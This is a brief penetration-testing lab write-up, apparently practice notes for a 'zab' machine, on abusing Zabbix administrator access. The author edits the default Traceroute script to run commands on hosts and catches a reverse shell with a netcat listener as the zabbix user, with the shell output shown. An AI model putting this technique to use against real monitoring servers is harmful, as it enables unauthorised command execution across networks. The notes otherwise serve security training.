InfoSec LAB

Zab_Lateral_Movement_zabbix

Created: 2 min read

Zabbix Script Execution

Compromising administrative access to a Zabbix instance poses a significant security risk, as it grants control over powerful features such as the remote command execution capability. Zabbix allows administrators to configure scripts that can execute arbitrary operating system commands on registered hosts. If an attacker gains such access, they can leverage this functionality to execute malicious code across the monitored infrastructure. This highlights the critical importance of securing Zabbix administrative interfaces and enforcing strict access controls.

Looking into the Scripts feature under the Alerts section, there are 3 default scripts

I will edit the Traceroute script

Successfully updated

Now I just need to execute the updated script by clicking into the host and the updated script; Zabbix Script Exec

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zab]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [192.168.45.155] from (UNKNOWN) [192.168.239.210] 36174
bash: cannot set terminal process group (33522): Inappropriate ioctl for device
bash: no job control in this shell
zabbix@zab:/$ whoami
whoami
zabbix
zabbix@zab:/$ hostname
hostname
zab
zabbix@zab:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:04:3d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.239.210/24 brd 192.168.239.255 scope global ens192
       valid_lft forever preferred_lft forever

Lateral Movement made to the zabbix user viaZabbix_Script_Execution

Interactive Graph View

Backlinks